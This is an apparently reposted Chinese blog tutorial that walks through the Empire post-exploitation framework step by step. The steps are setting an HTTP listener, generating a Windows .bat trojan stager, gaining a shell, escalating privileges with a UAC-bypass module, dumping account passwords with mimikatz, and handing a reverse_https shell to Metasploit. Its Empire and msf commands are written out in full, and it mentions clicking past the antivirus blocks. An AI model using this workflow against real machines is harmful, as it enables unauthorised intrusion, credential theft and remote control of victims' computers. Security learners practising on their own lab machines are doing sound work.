empire使用
0
安裝成功后在Empire檔案夾中打開終端執行./empire
1.設定監聽
輸入 listeners 命令進入監聽模塊,輸入 uselistener 加空格然后兩下 tab 可列出所有的可使用監聽類,選http
然后info就能查看監聽的詳細資訊辣
最后設定好監聽的Name(隨便起)和Host(默認本機ip)和Port(80)
然后execute,就拿下了
在listeners 模塊下通過 list 命令可查看已經設定的監聽,
2.生成木馬
設定好監聽后通過 back 命令回傳上一級,然后使用 usestager 命令來指定生成木馬的型別,通過空格加兩下 tab 可查看所有生成檔案的型別,這里我們使用 windows/launcher_bat,即 windows 平臺下的 bat 檔案,同樣,通過 info 查看此模塊的詳細資訊,最后執行execute
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener CFF
(Empire: stager/windows/launcher_bat) > execute
會出現這個
去檔案系統里找這個.bat檔案,把拖到windows里()
雙擊,回到kali輸入agents查看
help一下看看
選擇interact(交流; 溝通; 合作; 相互影響; 相互作用;) 和自己電腦的名字就可以進入shell,然后再help看看有什么模塊
輸一個sysinfo玩玩
3.提權
如果想執行 windows 系統自帶的命令,可以通過 shell 加命令的格式,例如查看當前 shell 的權限,我們輸入 shell whoami /groups,回傳了 medium 即非高權限
首先 empire 提供了很多使用模塊,這里我們通過 usemodule 空格加兩下 tab 可查看全部模塊,有二百多個
bypassuac 提權我們使用 usemodule privesc/bypassuac 這個模塊,然后 info 查看其資訊
繼續設定引數Listener 我的是CFF,設定后通過 execute 執行,成功后會回傳一個新的 shell,隨后我們通過 agents 查看已有的 shell,username 前帶 * 號的就是高權限已經提權成功的 shell,
中途騰訊電腦管家有攔截好幾次,,,,,,,全部允許后成功了
然后interact到那個帶*的agents,用 mimikatz 來獲取目標賬號密碼,要等一小會兒
然后輸入一個creds也能看
4.反彈shell給msf
empire 若需要結合 msf 使用,則可以將得到的 shell 反給 msf,使用模塊 code_execution/invoke_shellcode,輸入usemodule code_execution/invoke_shellcode
這里需要設定下 lhost 和 lport,lhost 即 msf 所在機器的 ip,lport 即 msf 監聽反彈 shell 的埠,還有一個引數注意下,就是 exploit,默認值是 reverse_https,這個不用改,開另一個終端 輸入msfconsole 進入msf,m輸入 use exploit/multi/handler 我們 msf 設定監聽時 payload 需要和其一致,也需要設定成 reverse_https,再設定msf的Lhost,Lport,Lhost 為本機所在的 ip,Lport 埠和剛才 empire 設定的一樣,這里是 4444
empire
msf
然后在msf exploit 執行監聽,這時回傳 empire 執行 execute,據說一會會看到 msf 已經收到了 shell,但我失敗了
如果沒有報錯可以回傳msf,回傳 shell 后,我們可以執行 whoami /groups 看下權限,可以看到回傳的是高權限的 shell,如下圖:
這是借鑒https://blog.csdn.net/fageweiketang/article/details/88020020
嗚嗚嗚
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/227616.html
標籤:其他
上一篇:Ubuntu16.04與18.04下如何在離線模式下安裝ssh, vncviewer,解決灰屏問題,并實作遠程桌面連接